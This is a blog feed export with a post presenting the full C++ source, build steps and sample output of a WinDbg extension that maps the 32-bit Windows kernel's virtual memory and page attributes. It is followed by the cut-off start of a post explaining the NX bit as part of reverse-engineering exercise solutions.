tag:blogger.com,1999:blog-85736853590564917362024-03-05T01:03:04.781-08:00Scrammed!giuliahttp://www.blogger.com/profile/12995367052667481710noreply@blogger.comBlogger20125tag:blogger.com,1999:blog-8573685359056491736.post-174548445501041162015-02-17T14:01:00.001-08:002015-02-17T14:02:32.103-08:00A WinDbg extension to print the kernel memory layout<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">WinDbg is an awesome debugger, but I always missed the nice, compact and tidy view of the process memory layout that you have in OllyDbg (in <i>View->Memory</i>). Obviously WinDbg is capable of showing information about the virtual memory of a process (e.g. with <i>!vad</i>) or of the kernel (e.g. with <i>!address</i>), but I don't really like the output format of its commands. I wanted a fast-to-read output, thus I decided to experiment with WinDbg's interfaces to write my own extension capable of printing a convenient map of all the kernelmode virtual memory.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">I chose to develop a DbgEng-style extension (see <a href="https://msdn.microsoft.com/en-us/library/windows/hardware/ff551059(v=vs.85).aspx">this</a> documentation for more information about the extension styles, and how to write an extension in general) that basically provides one main command that does the job. I wrote it for 32bit Windows machines, but I am planning to extend it to 64bit platforms as well. I tested it on Windows XP 32bit with PAE enabled, and in theory it should work on other 32bit Windows versions (with or without PAE), but I have not had time to run further tests yet.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The strategy of the command is simple: it iterates over all the possible virtual addresses of 4k pages in the kernel space (that is, from <i>0x80000000</i> to <i>0xFFFFFFFF</i>, for now I ignore the /3GB configuration option), it retrieves their corresponding PTEs and prints the attributes that they contain. Adjacent pages that have the same attributes are joined together and printed as a range. The output also includes some relevant symbols, e.g. it locates important regions identified by kernel variables like <i>MmNonPagedPoolStart</i>, <i>MmNonPagedPoolEnd0</i> etc., and it associates the names of loaded drivers to the regions of memory to which they are mapped.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Here are some excerpts from the output:</span></div>
<br />
<span style="font-family: Courier New, Courier, monospace;"> P = present W = writable X = executable L = large</span><br />
<span style="font-family: Courier New, Courier, monospace;"> U/K = user/kernel T = transition Y = prototype S = swapped out/zero demand</span><br />
<span style="font-family: Courier New, Courier, monospace;"> VA Size Attributes</span><br />
<span style="font-family: Courier New, Courier, monospace;">-------------------------------------</span><br />
<span style="font-family: Courier New, Courier, monospace;"> 0000000080000000 -------- - nt!MmSystemRangeStart </span><br />
<span style="font-family: Courier New, Courier, monospace;"> 0000000080004000 0000b000 P W X K </span><br />
<span style="font-family: Courier New, Courier, monospace;"> 0000000080010000 0000e000 P W X K </span><br />
<span style="font-family: Courier New, Courier, monospace;"> 0000000080039000 0000c000 P W X K </span><br />
<span style="font-family: Courier New, Courier, monospace;"> 000000008009f000 00062000 P W X K </span><br />
<span style="font-family: Courier New, Courier, monospace;"> 0000000080400000 00400000 P W X L K - nt - hal</span><br />
<span style="font-family: Courier New, Courier, monospace;"> 0000000080a02000 00170000 P W X K </span><br />
<span style="font-family: Courier New, Courier, monospace;"> 0000000080fb1000 0000f000 P W X K </span><br />
<span style="font-family: Courier New, Courier, monospace;"> 0000000081000000 01600000 P W X L K - nt!MmNonPagedPoolStart</span><br />
<span style="font-family: Courier New, Courier, monospace;"> 0000000082600000 -------- - nt!MmNonPagedPoolEnd0 </span><br />
<span style="font-family: Courier New, Courier, monospace;"> 0000000082600000 -------- - nt!MiExtraResourceStart </span><br />
<span style="font-family: Courier New, Courier, monospace;"> 00000000b1f96000 00001000 P W X K - kmixer</span><br />
<span style="font-family: Courier New, Courier, monospace;"> 00000000b1f97000 00004000 P X K - kmixer</span><br />
<span style="font-family: Courier New, Courier, monospace;"> ...</span><br />
<span style="font-family: Courier New, Courier, monospace;"> 00000000f888a000 00001000 P W X K - Cdfs</span><br />
<span style="font-family: Courier New, Courier, monospace;"> 00000000f888b000 00001000 P X K - Cdfs</span><br />
<span style="font-family: Courier New, Courier, monospace;"> 00000000f888c000 00001000 P W X K - Cdfs</span><br />
<span style="font-family: Courier New, Courier, monospace;"> 00000000f888d000 0000a000 T - Cdfs</span><br />
<span style="font-family: Courier New, Courier, monospace;"> 00000000f8897000 00001000 P W X K - Cdfs</span><br />
<span style="font-family: Courier New, Courier, monospace;"> 00000000f88b9000 00001000 T </span><br />
<span style="font-family: Courier New, Courier, monospace;"> 00000000f88c9000 00001000 T </span><br />
<span style="font-family: Courier New, Courier, monospace;"> 00000000f88d7000 00003000 P W K </span><br />
<span style="font-family: Courier New, Courier, monospace;"> ...</span><br />
<br />
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The <i>VA</i> and <i>Size</i> fields identify the memory range, then <i>Attributes</i> shows the properties of the pages it contains, and in the most right part of the output there are the symbols contained in such range. </span><span style="font-family: Verdana, sans-serif;">A </span><i style="font-family: Verdana, sans-serif;">VA</i><span style="font-family: Verdana, sans-serif;"> with an invalid size (identified by "--------") means that the <i>VA</i> is not allocated, but there is a symbol associated to it nonetheless.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">It is clear from the output that <i>VA</i> 80400000 is the beginning of a buffer, composed of two large pages (2Mb each), that contains the modules <i>nt</i> and <i>hal</i>. The <i>NonPagedPool</i> is also visible at <i>VA</i> 81000000 (11 large pages).</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">If we have a look at <i>VA</i> f888a000, we can see that this region of memory contains the module <i>Cdfs.sys</i>. Interestingly, the second page at VA f888b000 is read only (probably related to the .text section), while VA f888d000 is the starting of a set of pages that are not present and that are marked as transition PTEs (probably related to the .INIT or .PAGE section).</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The following four files are the full source code of the extension.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<b style="font-family: 'Courier New', Courier, monospace;">file 1: exts.cpp</b><br />
<style type="text/css">
pre.CICodeFormatter{
font-family:arial;
font-size:12px;
border:1px dashed #CCCCCC;
width:99%;
height:auto;
overflow:auto;
background:#f0f0f0;
line-height:20px;
background-image:URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RLiAlfLucI_qoHJvHaLwvgXby8Z5TK-aqUneDA06kscMW-ILm4a94iJq4qsFWJQEUtkkWWtnA6woWdwoPT2LE4DB2URdsSOOa3-smdrFFQB1oG2jam0NLQaJYk7Z95MyTJNdoHSDytEn/s320/codebg.gif);
padding:0px;
color:#000000;
text-align:left;
}
pre.CICodeFormatter code{
color:#000000;
word-wrap:normal;
}
</style>
<pre class="CICodeFormatter"><code class="CICodeFormatter"> #include "dbgexts.h"
char NameBuffer[1024];
char NameBufferPrevious[1024];
// symbol variables
bool MemSymbolsOk = false;
ULONG64 MemSymbols[][3] = {
// [api name] [symbol address] [symbol data]
(ULONG64)"nt!MmNonPagedPoolStart", 0, 0,
(ULONG64)"nt!MmNonPagedPoolEnd0", 0, 0,
(ULONG64)"nt!MmPagedPoolStart", 0, 0,
(ULONG64)"nt!MmPagedPoolEnd", 0, 0,
(ULONG64)"nt!MmNonPagedPoolExpansionStart", 0, 0,
(ULONG64)"nt!MmNonPagedPoolEnd", 0, 0,
(ULONG64)"nt!MmSystemRangeStart", 0, 0,
(ULONG64)"nt!MiExtraResourceStart", 0, 0,
(ULONG64)"nt!MiExtraResourceEnd", 0, 0,
(ULONG64)"nt!MiSystemViewStart", 0, 0,
(ULONG64)"nt!MiSessionPoolStart", 0, 0,
(ULONG64)"nt!MiSessionPoolEnd", 0, 0,
(ULONG64)"nt!MiSessionViewStart", 0, 0,
(ULONG64)"nt!MmSessionSpace", 0, 0,
(ULONG64)"nt!MiSessionImageStart", 0, 0,
(ULONG64)"nt!MiSessionImageEnd", 0, 0,
(ULONG64)"nt!MiSessionSpaceEnd", 0, 0,
(ULONG64)"nt!MmSystemPteBase", 0, 0,
(ULONG64)"nt!MmSystemPtesStart", 0, 0,
(ULONG64)"nt!MmSystemCacheStart", 0, 0,
(ULONG64)"nt!MmSystemCacheEnd", 0, 0,
(ULONG64)"nt!MmNonPagedSystemStart", 0, 0,
0, 0, 0
};
// passing ULONG64 as parameter is not going to work for some reason
// the only way is to pass 32bit numbers. %016llx does not work with printf like functions
char *Print64(ULONG32 HighPart, ULONG32 LowPart, char *String)
{
wsprintf(String, "%08x%08x", HighPart, LowPart);
return String;
}
// avoid 64bit parameters...
void PrintRange(ULONG32 BasePageAddress, char *BasePage, ULONG32 BaseSize, ULONG32 Attribs)
{
char AttribString[12];
UINT32 i;
HRESULT Result;
// string with attribs: PTWYXSL U/K
memset(AttribString, ' ', sizeof(AttribString));
if(Attribs & 1)
{
// page is valid, print hardware information
AttribString[0] = 'P';
if(Attribs & 2) // RW
{
AttribString[2] = 'W';
}
if(!(Attribs & 0x80000000)) // NX
{
AttribString[4] = 'X';
}
if(Attribs & 0x80)
{
AttribString[6] = 'L';
}
if(Attribs & 4) // User/Kernel
{
AttribString[8] = 'U';
}
else
{
AttribString[8] = 'K';
}
}
else
{
// Page is not valid, print additionally information aboout Prototype, Transition or Software pages
// taken from http://rekall-forensic.blogspot.ie/2014/10/windows-virtual-address-translation-and.html
// the windbg command "dt -r _MMPTE" shows all the PTE formats
if( !(Attribs & 0x400) && (Attribs & 0x800) ) // prototype = 0 transition = 1
{
// Transition PTE
AttribString[1] = 'T';
}
else if(Attribs & 0x400) // prototype = 1
{
// Prototype PTE
AttribString[3] = 'Y';
}
else if( !(Attribs & 0x400) && !(Attribs & 0x800) ) // prototype = 0 transition = 0
{
// Software PTE (paged out/zero demand)
AttribString[5] = 'S';
}
}
AttribString[10] = 0;
ExtPrintf(" %s %08x %s ", BasePage, BaseSize, AttribString);
// print the symbols associated to this VA range
i = 0;
if(MemSymbolsOk)
{
while(MemSymbols[i][0] != 0)
{
if((ULONG32)(MemSymbols[i][2]) >= BasePageAddress &&
(ULONG32)(MemSymbols[i][2]) < BasePageAddress + BaseSize)
{
ExtPrintf(" - %s", MemSymbols[i][0]);
}
i++;
}
}
// print the module names associated with this VA range
UINT32 j;
NameBufferPrevious[0] = 0;
for(i = BasePageAddress; i < BasePageAddress + BaseSize; i += 0x1000)
{
// try to locate the nearest symbol
Result = g_DebugSymbols->GetNearNameByOffset((ULONG64)(LONG)(i), 0, NameBuffer, 1024, NULL, NULL);
if(Result == S_OK || Result == S_FALSE)
{
NameBuffer[1023] = 0;
for(j = 0; j < 1024; j++)
{
if(NameBuffer[j] == '!')
{
NameBuffer[j] = 0;
break;
}
}
if(j < 1024)
{
// only print the name if it was not printed before
if(strcmp(NameBufferPrevious, NameBuffer) != 0)
{
ExtPrintf(" - %s", NameBuffer);
strcpy_s(NameBufferPrevious, 1024, NameBuffer);
NameBufferPrevious[1023] = 0;
}
}
}
}
ExtPrintf("\n");
}
#define PARAM64(__number, __numstring) Print64((unsigned)__number >> 32, __number, __numstring)
HRESULT CALLBACK exthelp(PDEBUG_CLIENT4 Client, PCSTR args)
{
INIT_API();
ExtPrintf("\nUse print_symbol to load the symbols required by the extension \n");
ExtPrintf("Then use print_layout to print the whole memory layout of the kernelspace. \n");
EXIT_API();
return S_OK;
}
HRESULT CALLBACK print_layout(PDEBUG_CLIENT4 Client, PCSTR args)
{
INIT_API();
ULONG64 PteAddress, PteEntry, BasePage;
ULONG32 BaseAttributes, CurrentAttribs, BaseSize, i;
ULONG64 Tables[10];
ULONG Levels;
HRESULT Result;
char TempString1[20];
// flags 0-based
// RW bit 1, 0 = read only
// U/S bit 2, 0 = kernelmode, 1 = usermode
// PS bit 7, 0 = 4k, 1 = 4mb
// NX bit 63, 1 = no execute
// W X L U
ExtPrintf("\n");
ExtPrintf(" P = present W = writable X = executable L = large\n");
ExtPrintf(" U/K = user/kernel T = transition Y = prototype S = swapped out/zero demand\n");
ExtPrintf(" VA Size Attributes\n");
ExtPrintf("-------------------------------------\n");
BasePage = 0xFFFFFFFFFFFFFFFF;
BaseAttributes = 0xFFFFFFFF;
BaseSize = 0;
for(ULONG64 VAddress = 0x80000000; VAddress < 0xFFFFF000; VAddress += 0x1000)
{
Result = g_DataSpaces2->GetVirtualTranslationPhysicalOffsets(VAddress, Tables, 10, &Levels);
if(Result != S_OK)
{
// if there was a previous buffer, print it out
if(BasePage != 0xFFFFFFFFFFFFFFFF)
{
PrintRange((ULONG32)BasePage, PARAM64(BasePage, TempString1), BaseSize, BaseAttributes);
}
// if the symbol refers to a non allocated page, print it here
i = 0;
while(MemSymbols[i][0] != 0 && MemSymbolsOk)
{
if((ULONG32)(MemSymbols[i][2]) >= (ULONG32)VAddress &&
(ULONG32)(MemSymbols[i][2]) < (ULONG32)VAddress + 0x1000)
{
ExtPrintf(" %s -------- - %s \n", PARAM64(VAddress, TempString1), MemSymbols[i][0]);
}
i++;
}
BasePage = 0xFFFFFFFFFFFFFFFF;
BaseAttributes = 0xFFFFFFFF;
BaseSize = 0;
continue;
}
PteAddress = Tables[Levels - 2];
Result = g_DataSpaces->ReadPhysical(PteAddress, &PteEntry, 8, NULL);
if(BasePage == 0xFFFFFFFFFFFFFFFF)
{
// case first page of buffer
BasePage = VAddress;
BaseAttributes = (PteEntry & 0x7FFFFFFF);
if(PteEntry & 0x8000000000000000) // NX bit
{
BaseAttributes |= 0x80000000;
}
BaseSize = 0x1000;
}
else
{
CurrentAttribs = (PteEntry & 0x7FFFFFFF);
if(PteEntry & 0x8000000000000000)
{
CurrentAttribs |= 0x80000000;
}
bool new_buf = true;
if((BaseAttributes & 1) && (CurrentAttribs & 1))
{
// if P bit is set in both
if( (BaseAttributes & 0x80000087) == (CurrentAttribs & 0x80000087) )
{
// and other interesting bits are equal in both, the buffer is continuing
new_buf = false;
}
}
else if(!(BaseAttributes & 1) && !(CurrentAttribs & 1))
{
// if P bit is not set in both
if( (BaseAttributes & 0x00000C00) == (CurrentAttribs & 0x00000C00) )
{
// and other interesting bits are equal in both, the buffer is continuing
new_buf = false;
}
}
// if P is different in both, break is obviously necessary
if(new_buf)
{
// if the protection is different:
// print the buffer and continue
PrintRange((ULONG32)BasePage, PARAM64(BasePage, TempString1), BaseSize, BaseAttributes);
// break to a new buffer
BasePage = VAddress;
BaseAttributes = (PteEntry & 0x7FFFFFFF);
if(PteEntry & 0x8000000000000000)
{
BaseAttributes |= 0x80000000;
}
BaseSize = 0;
}
// case following pages
BaseSize += 0x1000;
}
}
EXIT_API();
return S_OK;
}
HRESULT CALLBACK print_symbol(PDEBUG_CLIENT4 Client, PCSTR args)
{
INIT_API();
char TempString1[20];
char TempString2[20];
UINT32 i;
HRESULT Result;
i = 0;
while(MemSymbols[i][0] != 0)
{
Result = g_DebugSymbols->GetOffsetByName((char*)(MemSymbols[i][0]), &(MemSymbols[i][1]));
if(Result != S_OK)
{
ExtPrintf("Error retrieving symbol %s \n", (char*)MemSymbols[i][0]);
return Result;
}
Result = g_DataSpaces->ReadVirtual(MemSymbols[i][1], &(MemSymbols[i][2]), 8, NULL);
if(Result != S_OK)
{
ExtPrintf("Error reading symbol data for %s \n", (char*)MemSymbols[i][0]);
return Result;
}
ExtPrintf("Symbol retrieved %s, offset: %s data: %s \n", (char*)(MemSymbols[i][0]), PARAM64(MemSymbols[i][1], TempString1), PARAM64(MemSymbols[i][2], TempString2));
i++;
}
MemSymbolsOk = true;
EXIT_API();
return S_OK;
}
</code></pre><br>
<span style="font-family: Courier New, Courier, monospace;"><b>file 2: dbgexts.h</b></span>
<style type="text/css">
pre.CICodeFormatter{
font-family:arial;
font-size:12px;
border:1px dashed #CCCCCC;
width:99%;
height:auto;
overflow:auto;
background:#f0f0f0;
line-height:20px;
background-image:URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RLiAlfLucI_qoHJvHaLwvgXby8Z5TK-aqUneDA06kscMW-ILm4a94iJq4qsFWJQEUtkkWWtnA6woWdwoPT2LE4DB2URdsSOOa3-smdrFFQB1oG2jam0NLQaJYk7Z95MyTJNdoHSDytEn/s320/codebg.gif);
padding:0px;
color:#000000;
text-align:left;
}
pre.CICodeFormatter code{
color:#000000;
word-wrap:normal;
}
</style>
<br />
<pre class="CICodeFormatter"><code class="CICodeFormatter"> #include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define KDEXT_64BIT
#include <wdbgexts.h>
#include <dbgeng.h>
#pragma warning(disable:4201) // nonstandard extension used : nameless struct
#include <extsfns.h>
#ifdef __cplusplus
extern "C" {
#endif
#define INIT_API() \
HRESULT Status; \
if ((Status = ExtQuery(Client)) != S_OK) return Status;
#define EXT_RELEASE(Unk) \
((Unk) != NULL ? ((Unk)->Release(), (Unk) = NULL) : NULL)
#define EXIT_API ExtRelease
// Global variables initialized by query.
extern PDEBUG_DATA_SPACES2 g_DataSpaces2;
extern PDEBUG_DATA_SPACES g_DataSpaces;
extern PDEBUG_SYMBOLS g_DebugSymbols;
HRESULT ExtQuery(PDEBUG_CLIENT4 Client);
void ExtRelease(void);
HRESULT NotifyOnTargetAccessible(PDEBUG_CONTROL Control);
void __cdecl ExtPrintf(PCSTR Format, ...);
#ifdef __cplusplus
}
#endif
</code></pre><br>
<span style="font-family: Courier New, Courier, monospace;"><b>file 3: dbgexts.cpp</b></span>
<style type="text/css">
pre.CICodeFormatter{
font-family:arial;
font-size:12px;
border:1px dashed #CCCCCC;
width:99%;
height:auto;
overflow:auto;
background:#f0f0f0;
line-height:20px;
background-image:URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RLiAlfLucI_qoHJvHaLwvgXby8Z5TK-aqUneDA06kscMW-ILm4a94iJq4qsFWJQEUtkkWWtnA6woWdwoPT2LE4DB2URdsSOOa3-smdrFFQB1oG2jam0NLQaJYk7Z95MyTJNdoHSDytEn/s320/codebg.gif);
padding:0px;
color:#000000;
text-align:left;
}
pre.CICodeFormatter code{
color:#000000;
word-wrap:normal;
}
</style>
<br />
<pre class="CICodeFormatter"><code class="CICodeFormatter"> #include "dbgexts.h"
PDEBUG_CLIENT4 g_ExtClient;
PDEBUG_CONTROL g_ExtControl;
PDEBUG_DATA_SPACES2 g_DataSpaces2;
PDEBUG_DATA_SPACES g_DataSpaces;
PDEBUG_SYMBOLS g_DebugSymbols;
PDEBUG_SYMBOLS2 g_ExtSymbols;
extern "C" HRESULT ExtQuery(PDEBUG_CLIENT4 Client)
{
HRESULT Status;
if ((Status = Client->QueryInterface(__uuidof(IDebugControl), (void **)&g_ExtControl)) != S_OK)
{
goto Fail;
}
if ((Status = Client->QueryInterface(__uuidof(IDebugSymbols2), (void **)&g_ExtSymbols)) != S_OK)
{
goto Fail;
}
if ((Status = Client->QueryInterface(__uuidof(IDebugDataSpaces2), (void **)&g_DataSpaces2)) != S_OK)
{
goto Fail;
}
if ((Status = Client->QueryInterface(__uuidof(IDebugDataSpaces), (void **)&g_DataSpaces)) != S_OK)
{
goto Fail;
}
if ((Status = Client->QueryInterface(__uuidof(IDebugSymbols), (void **)&g_DebugSymbols)) != S_OK)
{
goto Fail;
}
g_ExtClient = Client;
return S_OK;
Fail:
ExtRelease();
return Status;
}
void ExtRelease(void)
{
g_ExtClient = NULL;
EXT_RELEASE(g_ExtControl);
EXT_RELEASE(g_ExtSymbols);
}
void __cdecl ExtPrintf(PCSTR Format, ...)
{
va_list Args;
va_start(Args, Format);
g_ExtControl->OutputVaList(DEBUG_OUTCTL_ALL_CLIENTS, Format, Args);
va_end(Args);
}
extern "C" HRESULT CALLBACK DebugExtensionInitialize(PULONG Version, PULONG Flags)
{
*Version = DEBUG_EXTENSION_VERSION(1, 0);
*Flags = 0;
return S_OK;
}
extern "C" void CALLBACK DebugExtensionNotify(ULONG Notify, ULONG64 Argument)
{
return;
}
extern "C" void CALLBACK DebugExtensionUninitialize(void)
{
return;
}
extern "C" HRESULT CALLBACK KnownStructOutput(ULONG Flag, ULONG64 Address, PSTR StructName, PSTR Buffer, PULONG BufferSize)
{
return S_OK;
}
</code></pre><br>
<span style="font-family: Courier New, Courier, monospace;"><b>file 4: dbgexts.def</b></span>
<style type="text/css">
pre.CICodeFormatter{
font-family:arial;
font-size:12px;
border:1px dashed #CCCCCC;
width:99%;
height:auto;
overflow:auto;
background:#f0f0f0;
line-height:20px;
background-image:URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RLiAlfLucI_qoHJvHaLwvgXby8Z5TK-aqUneDA06kscMW-ILm4a94iJq4qsFWJQEUtkkWWtnA6woWdwoPT2LE4DB2URdsSOOa3-smdrFFQB1oG2jam0NLQaJYk7Z95MyTJNdoHSDytEn/s320/codebg.gif);
padding:0px;
color:#000000;
text-align:left;
}
pre.CICodeFormatter code{
color:#000000;
word-wrap:normal;
}
</style>
<br />
<pre class="CICodeFormatter"><code class="CICodeFormatter">
;--------------------------------------------------------------------
; Copyright (c) 2000 Microsoft Corporation
;
;Module:
; dbgexts.def
;--------------------------------------------------------------------
EXPORTS
;--------------------------------------------------------------------
; These are the extensions exported by dll
;--------------------------------------------------------------------
exthelp
print_layout
print_symbol
;--------------------------------------------------------------------
;
; these are the extension service functions provided for the debugger
;
;--------------------------------------------------------------------
DebugExtensionNotify
DebugExtensionInitialize
DebugExtensionUninitialize
KnownStructOutput
</code></pre>
<br />
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">I took some macros from one of the source code templates that is available in the WinDbg SDK. I had problems when passing 64bit integers as function parameters (the extension was compiled for 32bit), therefore I used a quick and ugly macro (<i>PARAM64</i>) to solve the problem.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The core of the functionality is inside the <i>print_layout</i> function/command in <i>exts.cpp</i>:</span></div>
<br />
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>...</span><br />
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>for(ULONG64 VAddress = 0x80000000; VAddress < 0xFFFFF000; VAddress += 0x1000)</span><br />
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>{</span><br />
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>Result = g_DataSpaces2->GetVirtualTranslationPhysicalOffsets(VAddress, Tables, 10, &Levels);</span><br />
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>...</span><br />
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>PteAddress = Tables[Levels - 2]; </span><br />
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>Result = g_DataSpaces->ReadPhysical(PteAddress, &PteEntry, 8, NULL);</span><br />
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>...</span><br />
<br />
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">This is the main loop that iterates over every possible page, performing a virtual-to-physical translation by using <i>GetVirtualTranslationPhysicalOffsets</i>. This function is very interesting because it returns all the entries from all the steps used to perform the translation: the physical address of the <i>PDPT</i>, <i>PDE</i>, <i>PTE</i> and of the page itself (the translations steps change according to the features supported by the CPU). Then, the code uses <i>ReadPhysical</i> to read the data contained in the PTE and extracts all the attributes from it. The rest of the function simply recognizes ranges of pages that share the same attributes and, for every one being identified, </span><i style="font-family: Verdana, sans-serif;">PrintRange</i><span style="font-family: Verdana, sans-serif;"> is invoked.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">As the name suggests,</span><i style="font-family: Verdana, sans-serif;"> PrintRange </i><span style="font-family: Verdana, sans-serif;">is in charge of displaying the gathered information for every range, and takes as its arguments </span><span style="font-family: Verdana, sans-serif;">a range's virtual address, size and attributes</span><i style="font-family: Verdana, sans-serif;">. </i><span style="font-family: Verdana, sans-serif;">In addition, it is also responsible for determining</span><span style="font-family: Verdana, sans-serif;"> if one of the supported symbols (that are </span><span style="font-family: Verdana, sans-serif;">stored in the array </span><i style="font-family: Verdana, sans-serif;">MemSymbols)</i><span style="font-family: Verdana, sans-serif;"> is contained within the range </span><span style="font-family: Verdana, sans-serif;">and</span><span style="font-family: Verdana, sans-serif;"> if a driver module is associated to the range by using </span><i style="font-family: Verdana, sans-serif;">GetNearNameByOffset. </i><span style="font-family: Verdana, sans-serif;">In case it does, it prints them too. Of course, t</span><span style="font-family: Verdana, sans-serif;">hese two last capabilities only work if the debug symbols are loaded in WinDbg.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Note that the array of the supported symbols contains the names of internal kernel variables that identify interesting areas of memory (e.g. the paged pool, the non paged pool, etc.), and two empty entries that will be filled at run-time</span><span style="font-family: Verdana, sans-serif;"> with the virtual address of the symbol and the data it points to. This functionality is implemented in </span><span style="font-family: Verdana, sans-serif;">the </span><i style="font-family: Verdana, sans-serif;">print_symbol </i><span style="font-family: Verdana, sans-serif;">function/command: you should call it before <i>print_layout </i>in order to displays the supported symbols.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b><br /></b></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The source files <i>dbgext.cpp</i> and <i>dbgexts.h</i> contain macros and initialization code that are required by the extension, while <i>dbgexts.def</i> contains the definitions of the exported functions (that will become the actual commands to be invoked from WinDbg commandline).</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">To compile the extension, you need to add WinDbg's include and library paths, normally located in:</span></div>
<br />
<span style="font-family: Courier New, Courier, monospace;"> C:\Program Files\Debugging Tools for Windows (x64)\sdk\inc</span><br />
<span style="font-family: Courier New, Courier, monospace;"> C:\Program Files\Debugging Tools for Windows (x64)\sdk\lib\i386</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Make sure that you add the <i>.def</i> file via <i>project->properties->linker->input->module definition file</i> (this works on Visual Studio 2010).</span><br />
<span style="font-family: Verdana, sans-serif;">Once the extension is compiled, place it in WinDbg's extension folder:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"> C:\Program Files (x86)\Debugging Tools for Windows (x86)\winext</span><br />
<br />
<span style="font-family: Verdana, sans-serif;">and load it from WinDbg with:</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">.load <extensionfilename></span><br />
<br />
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Also make sure you have Windows debug symbols installed and loaded. At this point, using <i>!print_symbol</i> initializes the supported symbols, and <i>!print_layout</i> produces the final output.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">This is a POC, it was a good exercise to make practice with WinDbg extensions, I am planning to rework this source code to make it compatible with all versions of Windows on 32 and 64 bit. At the moment it is not very fast, it takes few minutes to print the whole layout, but I think it is possible to speed up the processing avoiding the brute force loop on every page, and handling in a smarter way the pages based on the contents of the PDEs and PTEs (basically if a PDE is invalid I can exclude a lot of memory addresses from the loop).</span></div>
<div>
</div>giuliahttp://www.blogger.com/profile/12995367052667481710noreply@blogger.com2tag:blogger.com,1999:blog-8573685359056491736.post-46395943097100090672015-02-09T18:14:00.000-08:002015-02-09T19:12:02.890-08:00Solution to some of "The Windows kernel" exercises from Practical Reverse Engineering (part 2)<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">
Here is the second part of the solutions to the "Windows Kernel" exercises from the "Practical Reverse Engineering" book. Specifically, this post is about the first eight that you will find in the "Investigating and Extending your Knowledge" section.<br>
It should be noted that the code proposed in my solutions is to be intended as working POCs and that the methodologies can be generalized/improved so that they would work independently of the Windows version etc. Finally, the ideas I used to solve the exercises are based on known mechanisms (e.g. the <i>KeUserModeCallback</i> method).<br><br>
<b>1)</span></b></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><i>NX</i> is a bit set in the page tables that specifies whether a memory page can run executable code or not. If the CPU tries to execute code from a page that is not marked as executable, an exception is raised. Windows (and other OSes too) leverages this bit in order to mark heap and stack data areas as not executable. In this way, should a buffer overflow happen, an attacker will not be able to exploit it in order to jump to a shellcode on the heap or stack. This bit is supported on <i>x64</i> architecture, and on x<i>86</i> with <i>PAE</i> enabled.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Prior to the introduction of this bit, there were some software implementations that tried to provide non-executable data by using hardware segmentation </span><span style="font-family: Verdana, sans-serif;">(e.g. </span><i style="font-family: Verdana, sans-serif;">W^X</i><span style="font-family: Verdana, sans-serif;"> and </span><i style="font-family: Verdana, sans-serif;">ExecShield</i><span style="font-family: Verdana, sans-serif;">)</span><span style="font-family: Verdana, sans-serif;">. The x86 hardware, in fact, provides segmentation in order to define code and data segments, each with its own properties (read, write or execute). Normally, Windows (32bit) creates usermode code and data segments (CS and DS) that are as big as the whole 32bit addressable range: this means that according to the code segment properties, every possible 32bit address is executable (the division between usermode and kernelmode is done via the page tables). This leaves the opportunity for an exploit to write shellcodes in data areas and execute them. To sort out this problem without the NX bit, it is possible to make a code segment smaller, in order to 